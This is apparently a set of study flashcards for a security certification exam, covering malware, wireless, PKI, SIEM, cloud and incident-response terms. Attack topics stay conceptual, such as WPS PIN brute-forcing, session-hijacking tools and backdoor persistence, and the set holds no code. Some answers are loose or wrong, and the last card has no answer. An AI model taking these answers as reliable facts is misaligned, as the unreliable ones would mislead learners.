If hurricane destroys organization building and there's no backups to keep it running what main Impact example would this affect?

Impact: Reputation (example)

Where can a Cloud access security broker be integrated? (3)

Implemented as client software, local security appliances, or cloud-based.

WPA history (2)

In 2002, was a Short term replacement of WEP and its serious cryptographic weaknesses. TKIP had vulnerabilities and was deprecated in the 802.11-2012 standard

Securing Network address allocation against Rouge DHCP servers (3)

In AD, DHCP servers must be authorized. Some switches can be configured with "trusted" interfaces that allows DHCP distribution. Cisco calls this DHCP Snooping

Fire suppression (2)

In Data centers uses chemicals like (Dupont) FM 200. Can detect with smoke, flame or heat detector.

covertext

In Steganography, the container document or file that contains hidden info

Firewall: ACL (4)

In firewalls, set of rules that allow or deny traffic based on tuples. Look at rules from top to bottom can be general or specific rules At the bottom of the list, Implicit deny if no rules are matched

Untrained users (3)

In person training may be time consuming and expensive. but critical to security and likely less expensive than a breach. should be annually reinforced with tests and scenarios.

Functional security tests

In secure automation, checks that everything can login and logout properly and ensure the platform everything is running on is secure.

Where and for who is the information gathered by the Privacy impact assessment available?

In the written privacy statement available to the users.

Roles and responsibilities (for Incident Response) (7)

Incident response team. IT security management. Compliance officers. Technical staff. (help from the trenches) User community. Legal team. public relations. etc

Web server providers are an example of which cloud deployment model?

Infrastructure as a Service example

Internal threats

Insiders

SSL Accelerators are often integrated into which devices?

Integrated into load balancers

Cloud access security broker

Integrated to provide security policies to cloud-based applications.

Agentless NAC (3)

Integrated with Active Directory. Checks are made during login and logoff. Can't be scheduled

Man-made threats

Internal or external threats

Common Criteria for Information Technology Security Evaluation (4)

International standard that designates what security controls are implemented in an OS. common reference for US Federal Government. ISO/IEC 15408. Security control level referenced as EAL.

Secure Guest topology (2)

Internet access with no internal network access. Integrate captive portal.

what are cloud-based methods to mitigate DDoS? (2)

Internet provider or reverse proxies

(Account management) Account maintenance (3)

Involves: initial provision with standard password management, and group and permission assignment. periodic updates to passwords and audits to permissions. During Off-boarding disable accounts and archive user documents and encryption keys

Where is ANT/ANT+ most commonly used? (2 eg)

IoT devices such as fitness devices and heart rate monitors

Sandboxing

Isolated testing environment with no connection to the real world or production system.

How does HIDS/HIPS deal with encrypted data

It deals with decrypted data since it sits on our desktop

What kind of wireless service is ANT? (2)

Its neither 802.11 or Bluetooth. Its its own separate wireless service.

Password cracker tools (3)

John the ripper, Ophcrack or cloud based paired with rainbow tables

When did development of NTPsec begin?

June of 2015

fighting keyloggers (3)

Keep Antivirus/Anti-malware updated for prevention. Block unauthorized exfiltration at the firewall/monitoring software. Run standalone keylogging scanner

Fighting Botnet Malware (5)

Keep Antivirus/Anti-malware updated for prevention. Patch applications and OS. Run deep scans regularly. Monitor traffic. Host-based firewalls/IPS can block the Command and control center.

Protect against adware/spyware (4)

Keep Antivirus/Anti-malware updated for prevention. Watch what you install. Backups. Run different specialized scans on top of antivirus. e.g. Malwarebytes

How to fight rootkits (3)

Keep Antivirus/Antimalware updated for prevention. UEFI's Secure Boot prevents installation into OS. For removal need a very specific rootkit remover

Single sign-on options (2)

Kerberos for windows. 3rd-party options

Key management life cycle (6)

Key generation. Certificate generation. Distribution. Storage. Revocation. Expiration.

Key stretching aka

Key strengthening (aka)

PBKDF2

Key stretching library that is part of RSA public key cryptography standards

BCRYPT

Key stretching library that uses the Blowfish cipher to perform multiple rounds of hashing for passwords.

Examples of things with EMI leakage (4)

Keyboards, hard drives, network connections, video

secure protocol(s) for Directory services

LDAPS (non-standard) SASL

what layer is an AP?

Layer 2 since its a bridge

Reasons for IP spoofing (4)

Legitimate: Load balancing. Load testing. Malicious: ARP Poisoning. DNS amplification/DDoS

MAC filtering in AP (3)

Lets you limit certain physical hardware addresses onto the network. keeps neighbors out. easy to capture packets find which MAC allowed and spoof MAC address with free open-source software

Virtualization Segmentation (2)

Lets you separate networks in a virtual environment. Add routers and firewalls with the click of a button.

LWAPP stands for

Lightweight Access Point Protocol

EAP-FAST (2)

Lightweight and secure authentication protocol. Cisco's proposal to replace LEAP (used on WEP)

False rejection rate (FRR)

Likelihood that the biometrics of an authorized user will be rejected

Which device can perform health checks on servers?

Load balancer

X.500 Attribute L

Locality. Usually a city or area

Rack security (3)

Locks. Fences and gates.

Collision example in 1996

MD5

full device encryption security

MDM backups the keys to decrypt the devices

best practice with third-party app stores (3)

MDM can disable/enable access to an app store. or setup a white list for apps. deny any apps not business appropriate

SMS/MMS security (2)

MDM can enable or disable this completely. or during certain times or locations.

screen lock security (2)

MDM can force password requirements. can set policies for failed attempts

Password and PIN security (2)

MDM can initiate recovery process, usually a question. MDM can also decide level of security

Firmware OTA updates security

MDM can manage and push out updates after they test what effect it has on company applications

Mobile content management

MDM can secure access to data by managing the DLP on on-site content (e.g. Microsoft Sharepoint, file servers) and cloud-based storage

Mobile device Recording microphone security

MDM: disable or geo-fence

Ettercap (3)

MITM software. set the targets as the IP addresses of the router and the target to monitor. Captures caches.

Most recent Microsoft implementation of CHAP

MS-CHAP v2

Web-of-trust model (2)

Makes every one an authority. alternative to PKI.

(penetration testing concepts) Persistence (4)

Making sure to stay in the system once exploited. set up a backdoor. build user accounts to log in normally. change or verify default passwords

Behavior-based

Malicious action identified by the IPS/IDS based on certain actions like deleting files or changing server configurations

False Negative

Malicious traffic that is missed by the IPS/IDS

Signature-based

Malicious traffic that matches specific predefined signatures stored on IPS/IDS

Security incidents examples (documented types?) (4)

Malware on email attachments. DDoS attack from Botnet. Insiders steal info. User installs peer-to-peer software that allows external access to data.

Virus (2)

Malware that can replicate itself through a computer, file systems and the network by running an executable. Some run very simple functions and seem invisible.

Rootkits (3)

Malware that modifies the kernel of the OS to avoid being detected by antivirus/malware. often combined with other malware. Its invisible to the OS, Task Manager, antivirus/malware

Trojan Horse

Malware that pretends to be a harmless to make users run it.

Keylogger (2)

Malware that records keystrokes to a file and sends it to bad guys. Can also log and send clipboards, screen shots, instant messaging, and search engine queries.

Spyware (3)

Malware that spies on you. often steals personal info affiliated with fraud or clearing bank accounts. May install keyloggers.

Botnet (2)

Malware that waits for a command and control center for further instructions. Many work together usually for DDoS. Can be rented for this purpose.

The patching process (4)

Manage centrally: pick which patches to install, usually security related patches. test patches. tell management server when to deploy.

Improper certificate and key management (4)

Management should be planned and documented: kind of CA. CA content protection. How will intermediate CAs be created and managed. Validate and sign certificate process

Alternate business practices examples (3)

Manual transactions. Paper receipts. non-automated phone calls for transaction approvals.

WiFi-enabled MicroSD cards security

Manufacturer should implement strong security including security control to the API.

How is spyware usually installed

May be installed alongside other software or as fake security software.

Requirements for hypervisor to use virtualization

May need a CPU that supports virtualization

Special purpose embedded devices (3)

Medical devices. Vehicles. Aircraft/UAV

RADIUS Federation (2)

Members of one organization can authenticate to the network of another organization. Use their normal credentials.

vulnerability scanner tools (3)

Microsoft Baseline Security Analyzer, Tenable Nessus, Nikto, web based type

Built-in FDE into OS (3)

Microsoft Bitlocker. Apple FileVault. Linux Unified Key Setup (LUKS)

Examples of on-site data storage (2)

Microsoft Sharepoint, file servers

Windows similar PKCS #12 format (2)

Microsoft's .pfx format. Often referenced interchangeably

application servers aka

Middleware

Identify vulnerability best practice

Might be a good idea to work with the vulnerability detection manufacturer so they can update scan for specific environment

RAID 1 (3)

Mirroring. duplicates data for fault tolerances. requires twice the disk space.

low power devices (for cryptography)

Mobile Devices, portable systems that use less power by using: Smaller symmetric key sizes. Elliptic curve cryptography (ECC) for asymmetric encryption

DSA

Modifies Diffie-Hellman key exchange for digital signature use.

Why adware and spyware are such common malware (3)

Money: Steals bank info and personal info for identity fraud. Make money with their adds. Use bandwidth e.g. to mine for crypto-currency

Places that announce exploits (2)

Monthly Microsoft patch release, Adobe Flash update

What is the most common protocol use of IPSec?

Most use both AH and ESP together.

carrier unlocking security issues (2)

Moving to another carrier can circumvent MDM. preventing SIM unlock may not be possible on a personal device

(Account management) Group-based access control (2)

Moving users between groups can set account privileges based on the group. Being in multiple groups can add on permissions.

Removing Single point of failures examples (6)

Multiple/backup/redundant: internet providers. network infrastructure devices. (routers, switches) servers. power source. cooling devices/system. groups of people in different locations.

What minimizes the impact of IPv4 shortage?

NAT use

how to prevent vulnerabilities (3)

NIST National Vulnerability Database: http://nvd.nist.gov. perform regular scan with updated signatures. watch news: trade magazines, publication websites

SHA created by

NSA (created this)

Most common NTLM seen today

NT LAN Manager v2 challenge/response

Old and New authentication method on Windows

NTLM. today standard is Kerberos

secure protocol(s) for time synchronization

NTPsec

PII examples (4)

Name. date of birth. mother's maiden name. biometric info (example of which Data sensitivity labeling)

Model Validation (2)

Near the end of development verify if: the original requirements were met. the right product is being built.

Model verification (3)

Near the end of development verify if: the software is working properly. there are any bugs to address. the product is being built right

Rainbow tables examples

Need different tables for different hash methods. e.g. windows different from MySQL.

Standard operating procedure concerns (2)

Need to be well documented. some must comply with industry regulations.

OS Types (6)

Network Server Workstation Appliance Kiosk Mobile OS

Steganography tools (techniques) (3)

Network based: hide messages in TCP packets. Image based: embed message, invisible watermarks. Yellow dots from a printer can be used to tell what printer was used to print document as well as date and time it was printed

Examples of times to use proper error handling (3)

Network connection disappears or fails. server failure. database unavailable

How to spot a rogue system on your network (2)

Network scanner. Hard to hide from a layer 2 ARP

ways to capture data for replay attacks (3)

Network tap, ARP poisoning, 3rd party software to capture packets.

GCM uses (4)

Network traffic security e.g. wireless, IPsec web server encryption using e.g. SSH, TLS

Data-in-transit security (4)

Network-based: Firewalls, IPS, Encryption: TLS IPsec

low latency (for cryptography)

Networks with fast computation time that uses: Symmetric encryption, smaller key sizes.

fighting XSS (4)

Never click untrusted links on emails, texts, comments, etc. Disable JavaScript. (although this would prevent many websites from working) Keep browsers and applications updated. Have Developer validate input

fighting impersonation (3)

Never disclose personal and company info Verify through 3rd parties who they are. You can call back.

IPsec AH ESP Tunnel mode

New IP Header/AH Header/ESP Header/IP Header/Data/ESP Trailer/Integrity Check Value

Cryptomalware (2)

New generation of ransomware that encrypts all files excluding the OS so it can show a message on who and how to pay. It also usually encrypts online backups.

Nmap add-on

Nmap scripting engine (NSE): extend capabilities, vulnerability scans

Name of Network scanners (2)

Nmap/Zenmap, Angry IP Scanner

secure protocol(s) for Network address allocation

No "secure" version of DHCP. Can be secure with DHCP snooping and limit MAC addresses per interface.

Open system

No authentication password is required

Misconfigured AP (2)

No encryption Wireless access to allow remote management of the device.

OCSP concerns (2)

Not all browsers/apps support it, e.g. early internet explorer versions. Some support it but don't bother checking revocation.

RC4 uses

Not used. WPA2 moved to AES instead.

Mandatory Access Control (MAC) (2)

OS limits user access to objects by setting labels on the objects to decide their clearance level. administrator decides who gets access to what security level

Evaluation Assurance Level

OS trust level from lowest, EAL1, to highest, EAL7.

What are a few things configuration compliance scanners may check? (5)

OS version, installed applications, network settings, anti-virus/anti-malware settings and versions, server configurations, etc

security concerns with SATCOM (3)

OS vulnerabilities. Remote code execution. similar security issues to smartphones

RTOS (ie)

OS with a deterministic processing schedule managing non-trivial systems. doesn't wait on other processes.

Different software licenses (3 ie, 1)

OS, applications, hardware appliance different methods to license

Modern malware encrypts itself until it executes is an example of what cryptography use case?

Obfuscation (Common use cases example)

How is adware usually installed

Often included alongside other software installations.

Amplification (2)

Often used with DDoS to send smaller requests reflect off other services or devices to create a bigger attack. Takes advantage of protocols with little/no authentication or checks: NTP, DNS, ICMP

Implicit deny

On a firewall ACL if traffic matches no rules there is a final invisible rule that denies that traffic even if it wasn't add by the user

Remote access VPN (2)

On demand access from a remote device to a VPN concentrator some configured as always on

Uses for Captive portal

On guest networks, avoids unauthorized use of network and keeps employees off this network.

Resource vs. security constraints (3)

On-going battle. Browser support vs. supported encryption. Make sure browser supports encryption type. VPN software support vs. supported algorithms. Make sure VPN concentrator can support the clients being installed on workstations.

Data sanitation tools (4)

One overwrite is enough to make data unrecoverable. entire hard drives: DBAN. Individual files or folders: Microsoft SDelete. delete all caches and temporary files, copies in caches

Fighting IP spoofing (3)

Only certain range of IP should be associated with a subnet. Apply rules (firewall) to prevent invalid traffic, enable switch security

SAML (3)

Open standard for authentication and authorization. Authenticate through a third-party to gain access to local resources. XML based markup language

OAuth usually combines with

OpenID which handles the SSO authentication

Database security (4)

Options: may have access control around usernames, passwords and permissions. Can encrypt everything or individual fields. Data integrity prevents data loss due to server or hardware problems. Well written application can prevent SQL injections and other access to data.

X.500 Attribute OU

Organizational Unit. A unit or department within the organization

Process Management

Organizing The IT "product" to work best with the organization

IPSec Transport mode (2)

Original Packet: IP Header/Data Mode: IP Header/IPSec Header/Data/IPSec Trailer The IPsec header and trailer encrypts the data

IPSec Tunnel mode (2)

Original Packet: IP Header/Data Mode: New IP Header/IPSec Header/IP Header/Data/IPSec trailer The destination and the data are encrypted

Methods of Key exchange (5)

Out-of-band: Telephone, courier, in-person. In-band: Additional encryption, asymmetric encryption

Example of mandated segmentation

PCI compliance

PEAP implementations (3)

PEAPv0/EAP-MSCHAPv2, which authenticate to Microsoft's MSCHAPv2 databases.

Strong algorithm examples (2)

PGP AES

Web of trust example

PGP (digital signature signing example)

Ways to connect to WPS (4)

PIN on the AP. Push button on AP. NFC. USB (not used anymore)

WPS attacks (4)

PIN was 8 digit number that validated the first 4 digits (10,000 possibilities), then then next 3 digits (1,000) and the last digit was a checksum for a total of 11,000 possible combinations. use to have no slowdowns or lockouts. Walk up to access point. Pixie Dust- poorly encrypted PIN can be received and brute forced offline in less then 30 min

who digitally signs public key certificates?

PKI uses CA to sign. Web of trust uses other users.

Means of Session Hijacking (4)

Packet capture: Wireshark, Kismet. (over air) Exploits: Cross-site scripting. After session ID captured: Modify headers: Tamper, Firesheep, Scapy. Modify cookies: Cookies Manager+ (Firefox add-on)

Control Plane

Part of SDN that's responsible for the configuration of the device.

data plane

Part of SDN that's responsible for the hard work i.e. forwarding frame or providing firewall functionality

Secure Boot

Part of UEFI specification that has a set of know-good digital signatures that allow OS to boot if they match those signatures.

Different types of vulnerability exploits (4 eg)

Password brute-force. Social engineering. Database injections. Buffer overflows

Something you know examples (3)

Password. PIN. Pattern

Concern with patching OS

Patches can introduce problems with the OS or applications on the OS.

Security as a service (2)

Pay for the security you need in the cloud. scale up and down as needed

Reasons to Segment networks (4)

Performance. Security. Compliance. which also makes change control easier

Advantage of a Tabletop exercise (2)

Performing a full-scale disaster drill can be costly. Many of the logistics can be determined through analysis rather then a physical drill.

PKCS #12 standard and development

Personal Information Exchange Syntax Standard. Developed by RSA Security. now an RFC standard

Vishing

Phishing over the phone.

control diversity (for defense in depth) (3)

Physical. Administrative. Technical

Segmentation types (4)

Physical. Logical. (VLAN) Virtualization. Air Gaps

Backdoors (2)

Placed on your computer through malware to allow other malware to install. some software have these as unknown vulnerabilities.

SalesForce.com offers which cloud deployment model?

Platform as a service

Administrative controls (2 eg)

Policies and procedures everyone must follow for: on boarding and off boarding visitors. back up media handling

Key management (3)

Policies for: protecting physical and digital keys. Key generation. Key breaches. (unauthorized access to keys)

Some personnel issues (5)

Policy violation. Insider threat. Social engineering. Social media. Personal email

IEEE 802.1x aka

Port-based Network Access Control (NAC) (aka)

Lessons learned (5)

Post-incident meeting. Do it while memory of the incident is fresh. Find out what happened. Evaluate and fix incident response plans. Evaluate and add precursors.

Things VPN can check for Baseline deviation (3)

Posture analysis checks: antivirus version. signature version. OS patches

SCADA/ICS examples (3)

Power generation. refining. manufacturing equipment

Principles of social engineering: Authority (ie)

Pretends to be in charge or high position. ie CEO/help desk/police

Remote attestation security (2)

Prevent devices from booting if they do not match previous inventories. (If changes identified) Since it takes place in the hardware of computer it can stop whole boot process before OS is infected.

Anti-spoofing on routers (3)

Prevents bad guys from using someone else's address for MITM, DDoS, etc by: Filter reserved IP addresses, like RFC 1918 addresses, with ACL Enable Reverse Path Forwarding (RPF)

CER (3)

Primarily a Windows X.509 file extension. Can be encoded as binary DER format or as the ASCII PEM format. Usually contains a public key.

Types of virus (4)

Program virus. Boot sector virus. Script virus. Macro virus

Reason for Access violations (2)

Programming problem: application is pointing to the wrong part of memory. security problem: malware/3rd party application attempting to access restricted memory, try to cause DoS

NULL Pointer dereference (3)

Programming technique that references a portion of memory. what happens if that reference points to nothing? Application crash, debug info displayed, DoS

Places collectors can gather data to (4)

Proprietary consoles like IPS, firewalls. SIEM consoles have correlation engine to compare diverse sensor data. syslog servers

what data is often unique to an organization?

Proprietary data

Protected distribution aka (2)

Protected distribution system. (PDS) Protected cabling

ESP

Provides encryption for IPSec MD5, SHA-1 or SHA-2 for hash 3DES or AES for encryption New IP Header/ESP Header/IP Header/Data/ESP Trailer/Integrity Check Value

SFTP (2)

Provides file transfers over SSH. Provides file system functionality.

Authentication (2)

Proving you are who you say you are. done with passwords and other factors.

Provisioning when deploying an application (5)

Provision: web server, database server, middleware server, user workstation configurations, certificate updates, etc

Transparent proxy

Proxies that are invisible and unknown to users and no addition configuration needs to be done to take advantage of the proxy

Described as contactless smart cards

Proximity cards (description)

Microsoft and amazon cloud-based offering an example of which cloud deployment model?

Public cloud deployment model

(Digital certificate) Public Key

Public key and algorithm used by the certificate holder. (e.g. RSA, ECC(256 bits))

Asymmetric algorithm aka

Public key cryptography (aka)

S/MIME

Public key encryption and digital signing of mail content.

Distributed allocation

Puts critical assets, data and other systems in different locations to make harder to target and exploit an application instance.

Who would usually use sandboxing for code quality and testing and what would they test? (4)

QA can fuzz, overload, stress test and try to break environment without having to worry about harming the production environment.

access database examples for IEEE 802.1x (3)

RADIUS, LDAP, TACACS+

Combined RAID types and why?

RAID 0+1, RAID 1+0, RAID 5+1, etc. increases redundancy.

CAPWAP (2)

RFC open standard to manage WAPs from Wireless LAN controllers. based on LWAPP

versions of RIPEMD

RIPEMD-128. RIPEMD-160. RIPEMD-256 RIPEMD-320

secure version of RIPEMD

RIPEMD-160, no known collision issues

Motion detection alarms (2)

Radio reflection or passive infrared. Useful in areas not often in use

Compensating examples

Re-image or restore from backup. Hot site. Backup power system (control example)

Ways to provide redundancy and fault tolerance (5)

Redundant hardware components. (ie multiple devices) RAID. UPS. Clustering of servers. Load balancing

RAT aka

Remote Administration Tool

DarkComet

Remote access Trojan with many features including keylogger that captures all keystrokes

NFC Security Concerns (4)

Remote capture within 10 meters. Frequency jamming. Replay/MITM if not encrypted. stolen/lost device, make use of this

After-action reports (4)

Report after an exercise detailing: exercise scope and recovery objectives. Methodology. what did and didn't work. updates to procedures, tools.

Example of waterfall development (6)

Requirements, analysis, design, coding, testing, operations (hand off to operation team that adds it to production environment)

what is needed for emails to use S/MIME

Requires a PKI or a similar means to manage and provide keys.

Criteria examples for Attribute-based access control(6)

Resource info, IP address, time of day, desired action, geographical location, relationship to the data, etc

Data steward (3)

Responsible for data accuracy, privacy, and security. assigns sensitivity labels to the data. ensures compliance with any applicable laws and standards for data

Important physical signs (5)

Restricted areas. fire exits. warning signs e.g. chemical, construction. medical resources. information e.g. number to call for emergencies

how does SFTP provide file management (3)

Resumes interrupted transfers, directory listings, remote file removal, etc

Data roles

Roles with access to data based on their responsibility in the organization.

Reverse Path Forwarding (RPF) (2)

Router feature that makes sure the response to an inbound packet is returned the same way or it is dropped. Anti-spoofing measure

secure protocol(s) for Email (3)

S/MIME. STARTTLS on POP3 and IMAP. SSL/TLS

WiFi-enabled MicroSD cards

SD flash storage device that allows 802.11 Wifi file transfers from a camera to a computer without removing the card.

secure protocol(s) for routers and switches

SHH. SNMPv3. HTTPS (from a browser)

SIEM security reports

SIEM built-in feature that can build reports of weekly or even monthly collection of collected data into a single graphical view.

(SIEM data) correlation (eg)

SIEM feature that correlates different devices on the network. e.g. see someone log in from the firewall and access info on a server

log aggregation (7 eg)

SIEM feature that logs all info from many different devices on the network to one place: switches, routers, firewalls, servers, desktops, laptops, mobile devices, etc

Event deduplication (3)

SIEM feature that prevents duplicates of an event from filling the logs to focus on the real security event Flapping- timers to time how often an event occurred and write it as a single event occurring a number of times. SIEMs allows configurable suppression, define how events are handled, useful for automated responses

Automated alerting and triggers (2)

SIEMs can be automated to give alerts and respond to certain events or alerts (e.g. send you a text, call, email or/and automatically Open a ticket, reboot a device) User can mark exceptions and put them into the log

compliance mandates for off-site backups (3)

SOX. Federal Information Systems Management Act. (FISMA) HIPAA

secure protocol(s) for voice and video

SRTP

secure protocol(s) for Remote access

SSH

Domain validation (DV) (2)

SSL certificate owned by someone who has some control over a DNS domain. confirmed by the CA

Extended validation (EV) (2)

SSL certificate that gets additional checks to verify the certificate owner's identity. receives a green name on the address bar.

secure protocol(s) for Web

SSL/TLS = HTTPS

Cloud deployment models (7)

SaaS. PaaS. IaaS. Private. Public. Hybrid. Community

example of a safe Containment of an incident

Sandboxes can collect incidents.

Stages of deployment (5)

Sandboxing. Environments: - Development. - Test. - Staging. - Production

Examples of Regulatory Frameworks (3)

Sarbanes-Oxley Act. (SOX) Health Insurance Portability and Accountability Act. (HIPAA) Gramm-Leach-Bliley Act (GLBA)

Purging examples

Sdelete. DBAN

Fighting Dumpster Diving (3)

Secure garbage with fence and lock Shred, burn, pulp documents Look through trash to see there's sensitive material, consider training users if there is

File system security (3)

Security provided for files by most OS. uses ACL or lists of groups or users that are assigned rights and permission to particular files. access provided by file owner or centrally administrated. can have built-in encryption

Substitution Cipher

Security through obscurity where you substitute one letter for another

Single sign-on security

Seems like it requires only user name and password but allot of cryptography happens behind the scenes.

What Out-of-band response does passive monitoring IPS send?

Sends TCP (reset) frames

Security provided by segmenting a network (eg)

Separate who gets access to certain networks. e.g. users should not communicate directly to database servers

Hosted (Infrastructure) (2)

Servers are not in your building and likely owned by some one else. Usually in a specialized computing environment

Types of updates for patch management (3)

Service packs- large set of updates. Monthly updates. emergency out-of-band updates

Privileged accounts security (3)

Should not use these accounts for normal administration. Highly secure with strong passwords and MFA. scheduled password changes

New threats/zero day best practice

Should patch fast sometimes even with little to no tests

Digital signatures (2)

Signs message hashes with private key and can be verified with public key. Provides Authentication, non-repudiation and integrity.

SASL stand for?

Simple Authentication and Security Layer

WPS

Simple WiFi setup that had a design flaw

Memory/buffer vulnerabilities and types (5 types)

Since application are executing in memory, manipulating memory can manipulate application. Types include: Memory Leak. Integer overflow. Buffer overflow. Pointer dereference. DLL injection

what services can you disable on an application server?

Since application servers have very specific functionality you can disable all other services running on that device.

Hierarchical CA (2)

Single CA issues certificates to intermediate CAs. Distributes the certificate management load.

(PKI) trust models (5)

Single CA, Hierarchical, Mesh, Web-of-trust, Mutual authentication

Things Group Policy can administer

Sites, domains, OUs, groups, location, or any combination of AD administrative boundaries.

Something you have examples (4)

Smart card. USB token. Hardware or software tokens. Your phone.

Tokens and cards examples (4)

Smart card. USB token. Hardware or software tokens. phone.

MAC OS Update options (2)

Software Update. (old name) App Store

Google Mail is an example of which cloud deployment model?

Software as a service

Ransomware

Software that encrypts programs and data until a ransom is paid to remove it.

Difference between MOA and MOU

Some consider MOA a step up of MOU but often they are used interchangeably.

WPA2 concerns

Some older hardware could not run this since it requires additional computing resources.

Personnel issues: Policy violation (2 eg)

Some one violates AUP, e.g. transfers info, visits a website not allowed, etc

camera systems security concerns

Some one with access over IP would know when people are around and what security is in place.

Example of compliance issues with personal email policies

Some organizations are legally required to prohibit personal email from a business account (example of)

NTLM vulnerabilities

Some systems store NTLM hash to provide backwards compatibility. vulnerable to credential forwarding attack, use credentials of one computer to gain access to another

Data owner (2)

Someone at executive level with administrative responsibility for the application and data. responsible for signing off on the compliance of data

Tuples examples

Source IP, Destination IP, port number, time of day, application, etc

Role-based awareness training

Specialized training that is customized to the specific role that an employee holds in the organization.

ways to harden a system (3)

Specific guides: Check Manufacturer's site. Internet Interest Groups. General-purpose guides

Separation of duties (2)

Split knowledge. Dual control

Kerberos timeline

Standard since the 1980s. Microsoft started using it in Windows 2000 and compatible with all Windows after that.

X.500 Attribute ST

State. A state, province, or county within a country.

SAST stands for?

Static Application Security Testing

How antivirus deals with viruses (2)

Stops it from downloading or executing and quarantines it to a separate part of storage. The signature list needs to be constantly updated since thousands of new viruses released every day.

RAID 0 (3)

Striping data across many drives without parity. High performance. no fault tolerance

RAID 5 (3)

Striping with Parity. fault tolerant. requires additional disk for redundancy

IEEE 802.1x authentication process (7)

Supplicant tries to communicate. Authenticator sends EAP-request to supplicant asking if new authentication. Sup sends Username in a EAP-Response. Auth checks with server. If valid server asks if user can speak privately which is passed to sup. Sup sends credentials. Server validates and allows access to network.

EAP-TTLS

Supports other authentication protocols in a TLS secure tunnel.

IEEE 802.1x: Authenticator (2)

Switch or wireless access point between the supplicant and authentication server. Sometimes has authentication server builtin to it.

Securing Network address allocation against DHCP Starvation Attack (2)

Switches can be configured to limit the number of MAC addresses per interface. Disables an interface when multiple MAC addresses are seen

Session keys (2)

Symmetric keys sent over by client using server's public key. Server decrypts it using its private key.

Reporting requirements/escalation: External contact examples

System owner. law enforcement. US-CERT (if working for US Government)

Load balancer features (6)

TCP offloading. SSL offload. caching. QoS. Content switching. (balance applications differently between servers) manage load between servers

WPA concerns

TKIP has vulnerabilities and was deprecated.

One of the more common OTP methods used by Google, Facebook, Microsoft

TOTP (uses)

Hardware root of trust Examples (2)

TPM. HSM

Cross-site request forgery

Takes advantage of the trust a web application has for the user by getting the user to click on an email link to unknowingly send the bad guy's request as if sent by the user.

IP spoofing

Taking some one else's IP or pretending to be an IP outside the network.

What environment does quality assurance check for bugs?

Test environment

Sarbanes-Oxley Act (SOX)

The Public Company Accounting Reform and Investor Protection Act of 2002. established sweeping auditing and financial regulations for public companies. helps protect shareholders, employees and the public from accounting errors and fraudulent financial practices.

(Digital certificate) Version

The X.509 version supported (V1, V2, or V3)

(Digital certificate) Signature Algorithm

The algorithm used by the CA to sign the certificate.

Cryptanalysis

The art of cracking encryption

DoS

The forced failure of a service.

(Digital certificate) Issuer

The name of the CA, expressed as a Distinguished Name (DN).

(Digital certificate) Subject

The name of the certificate holder, expressed as a Distinguished Name (DN).

carrier unlocking (2)

The process of unlocking a phone from a cellular provider after certain amount of payments or times used. Can be illegal to lock in certain countries.

Crossover error rate (3)

The rate at which FAR and FRR are equal. Adjust sensitivity to equalize both values. A lower rate indicates a more accurate biometric system.

X.509

The standard format for digital certificates.

data exfiltration (2)

The unauthorized transfer of data outside an organization. usually made easy when our networks are high-speed and allow people walk in and remove data through USB or DVD, etc

Passive monitoring

The use of an IPS as a network tap/ port mirror (SPAN) to examine a copy of the traffic can't block traffic only alert

How worms are usually installed

They go through the network and infect systems with known vulnerabilities

How are false Positives identified

Time consuming to research and resolve all the signatures

(Incident Response) Exercise (5)

Time to test your Incident responsive teams. have well-defined rules of engagement. Usually a very specific scenario. Might be a Table top exercise. Document and discuss the response.

Fighting Jamming

To overwhelm good signal the bad signal must be close. fox hunting- use directional antenna and attenuator to locate source.

Fighting tailgating (4)

Train users on policies and to ask questions Visitor Policy: Visitors be required to wear badges Mechanical doors for 1 person per scan, mantraps, airlocks that remember if a person is already in.

Principles of social engineering: Familiarity

Tries to get you to like them so you want to do things for them

Sandboxing use during the development process (2)

Try some code and implement new systems without effecting production environment. Incremental development.

Reasons for MAC spoofing (4)

Try to circumvent MAC-based ACL. Bypass a WiFi address filter. Can be done for legitimate reasons: Internet provider expects a certain MAC address. Certain applications require a particular MAC address

Integer overflow

Trying to put a very large number in a small allocated area that causes the rest of the number to spill over and usually have some effect the application.

what is Blowfish's successor?

Twofish (succeeded what?)

Network OS

Type of OS that connects many devices over a network connection

Server OS

Type of OS that provides a particular service usually a server.

Typo squatting (2)

Type of URL hijacking where the URL is misspelled. Misspelling URLs can be sold, redirected to competitors, used as phishing site or drive-by downloads.

Worm

Type of malware that spreads quickly through the network without user help.

IV

Type of nonce that provides randomization for encryption

Explicit proxy

Type of proxy where computers need to be configured at the OS or browser to use the proxy to access the internet.

WannaCry (3)

Type of worm that: installs on networks with Microsoft SMB v1 vulnerability. exploits eternal blue software to install a backdoor that installs an updated version of this worm. encrypts the computer and demands bitcoin payment for decryption while continuing to spread through the network.

UTM (11)

URL filter/content inspection Malware inspection Spam filter CSU/DSU Router, Switch, Firewall IDS/IPS Bandwidth shaper VPN endpoint logs with filters

Things seen on a WAF log

URL, Attack Name, logged or denied, etc

Misconfigured content filters (2)

URLs may not be specific enough to provide blocking Some protocols may not be filtered, e.g. https

AES uses (2)

US Federal Government standard. WPA2

Types of Jamming (5)

Unintentional: Interference like Microwave oven, fluorescent lights Intentional: malicious Constant, random bits / constant, legit frames random times for data sent reactive, done when some one tries to communicate

UAV stands for?

Unmanned Aerial Vehicle

Unauthorized software (4)

Untested software and may contain: malware, spyware, ransomware. Conflicts: May conflict with organization's mission-critical software. Licensing, all software must be legal. Ongoing support: creator of the software provide constant updates, security patches, versions. policy to make sure everything is updated

(Account management) auditing best practice

Usage and permission auditing and time-of-day restrictions can be automated: receive alerts and logs of issues to resolve.

Authentication tools used for RADIUS Federation (3)

Use 802.1x as the authentication method. RADIUS on the backend. EAP to authenticate.

Mobile Application management (2)

Use MDM to add and manage application whitelisting to devices. New application have to be checked and updated to the list

Mobile Device Camera use security (2)

Use MDM to disable use. or use geofencing.

Recovery (for forensics) (2)

Use Strategic intelligence and counterintelligence gathering to strengthen security based on forensic data gathered.

IEEE 802.1X Certificate-based authentication

Use certificate stored on devices to gain access to the network.

Supply chain security (3)

Use trusted vendors. make sure bought devices were not previously connected to the internet. verify that hardware and firmware is genuine.

Where OAuth is used

Used in Twitter, Google, Facebook, LinkedIn, and more

examples of places LDAP is used (3)

Used in: Windows Active Directory. Apple OpenDirectory. OpenLDAP. etc

Where is LDAP used? (3 e.g)

Used on: Windows Active Directory. Apple OpenDirectory. OpenLDAP, etc

Code signing certificate security

User's OS checks and validates that the software hasn't been modified. user can stop application execution and contact developer

Access control models (5)

Users receive rights based on these: - MAC - DAC - ABAC - Role-based access control - Rule-based access control

Kerberos security

Uses Mutual authentication between client and server to protect against MITM and replay attacks.

SSL VPN (4)

